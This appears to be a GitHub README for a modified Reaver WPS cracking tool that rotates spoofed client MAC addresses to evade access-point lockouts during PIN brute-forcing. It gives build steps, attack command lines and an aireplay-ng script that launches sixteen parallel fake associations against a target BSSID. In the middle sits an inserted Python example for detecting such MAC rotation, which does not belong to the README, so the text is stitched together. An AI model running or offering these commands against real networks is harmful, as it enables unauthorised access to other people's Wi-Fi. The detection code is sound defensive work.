REAVER WPS WITH MAC CHANGER
==============
A modified version of Reaver WPS that changes the last character of the MAC address to speed up the attack.
Sometimes the AP will reject the "EAPOL Request" after a successful pin try. I ran some tests with simultaneous reaver instances running with different MACs (the -m argument), and when one instance gets "WARNING: Receive timeout occurred", the other gets "Received identity request" and continues the cracking.
The problem with this method is that the reaver tool doesn't support simultaneous instances (OK, I read the FAQ about it). If you run two reaver instances, for example, both instances will try the same pin at the same time.
I made some changes to the reaver source code. Look at the output after my changes:
```
[+] Using MAC BC:99:47:B7:03:E9
[+] Trying pin 00485678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E8
[+] Trying pin 00495677
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Using MAC BC:99:47:B7:03:E7
[+] Trying pin 00505673
...
```
On the first try, reaver uses the client MAC "BC:99:47:B7:03:E9" (it is not a real MAC, I'm just using it for the example), on the second, "BC:99:47:B7:03:E8", and on the third, "BC:99:47:B7:03:E7". After using the MAC "BC:99:47:B7:03:E0", reaver starts again at "BC:99:47:B7:03:E9".
The numbers:
With this method: (13 seconds/pin)
Without this method: (31 seconds/pin)
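Seen from the access point's side, the rotation described above spreads the failed pin attempts over MACs that differ only in the last hex digit, so each MAC accounts for only a fraction of the failures and any count has to be aggregated per BSSID and per MAC prefix. The following is an added detection example, not part of this README or of reaver; the log format, the `WSC_NACK` event name and the thresholds are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed sample events in a hypothetical format:
#   epoch_seconds  bssid  client_mac  event
SAMPLE_LOG = """\
1000 AA:BB:CC:DD:EE:FF BC:99:47:B7:03:E9 WSC_NACK
1013 AA:BB:CC:DD:EE:FF BC:99:47:B7:03:E8 WSC_NACK
1026 AA:BB:CC:DD:EE:FF BC:99:47:B7:03:E7 WSC_NACK
1030 AA:BB:CC:DD:EE:FF 00:11:22:33:44:55 WSC_NACK
1039 AA:BB:CC:DD:EE:FF bc:99:47:b7:03:e6 WSC_NACK
1040 AA:BB:CC:DD:EE:FF 00:11:22:33:44:55 ASSOC
garbage line
5000 AA:BB:CC:DD:EE:FF 00:11:22:33:44:55 WSC_NACK
"""

MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$")

def parse_failures(log):
    """Yield (ts, bssid, mac) for each well-formed WSC_NACK line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[3] != "WSC_NACK" or not parts[0].isdigit():
            continue
        bssid, mac = parts[1].upper(), parts[2].upper()
        if MAC_RE.match(bssid) and MAC_RE.match(mac):
            yield int(parts[0]), bssid, mac

def find_rotating_clients(log, window=300, min_macs=3):
    """Flag sets of client MACs that differ only in the last hex digit and
    fail WPS against the same BSSID within `window` seconds."""
    groups = defaultdict(list)
    for ts, bssid, mac in parse_failures(log):
        groups[(bssid, mac[:-1])].append((ts, mac))   # key drops last digit
    alerts = []
    for (bssid, prefix), events in groups.items():
        events.sort()
        start, best = 0, None
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                            # slide window forward
            macs = {m for _, m in events[start:end + 1]}
            if len(macs) >= min_macs and (best is None or len(macs) > len(best["macs"])):
                best = {"bssid": bssid, "prefix": prefix, "macs": sorted(macs),
                        "failures": end - start + 1}
        if best:
            alerts.append(best)
    return alerts

if __name__ == "__main__":
    for alert in find_rotating_clients(SAMPLE_LOG):
        print(alert)
```

The single unrelated client in the sample is not flagged because it never appears with sibling MACs; only the group sharing the prefix `BC:99:47:B7:03:E` is reported.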
How to install
==============
Extract the tarball
```bash
tar -xzvf reaver-1.4-mac-changer.tar.gz
```
Install Required Libraries and Tools
```bash
sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
```
Build Reaver
```bash
cd reaver-1.4-mac-changer
cd src
./configure
make
```
Install Reaver
```bash
sudo make install
```
How to use
==============
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF -M
```
or
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer
```
What I recommend:
```bash
reaver -i mon0 -b AA:BB:CC:DD:EE:FF --mac-changer --no-nacks --win7 --no-associate -vv
```
To associate more effectively, I recommend using the aireplay-ng tool. Create an "associate.sh" file and put this inside:
```bash
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZF &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZE &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZD &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZC &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZB &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:ZA &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z9 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z8 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z7 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z6 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z5 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z4 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z3 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z2 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z1 &
aireplay-ng mon0 -1 120 -a AA:BB:CC:DD:EE:FF --ignore-negative-one -h ZZ:ZZ:ZZ:ZZ:ZZ:Z0 &
```
PS: Change AA:BB:CC:DD:EE:FF to the BSSID and ZZ:ZZ:ZZ:ZZ:ZZ:Z to your MAC (without the last digit).
Before using the reaver tool, just type "sh associate.sh". To kill all the aireplay-ng processes, type "killall aireplay-ng".
If you have success using this method, please share it with us so we can keep improving reaver WPS.
Author
==============
[@gabrielrcouto](http://www.twitter.com/gabrielrcouto)
License
==============
[MIT License](http://zenorocha.mit-license.org/)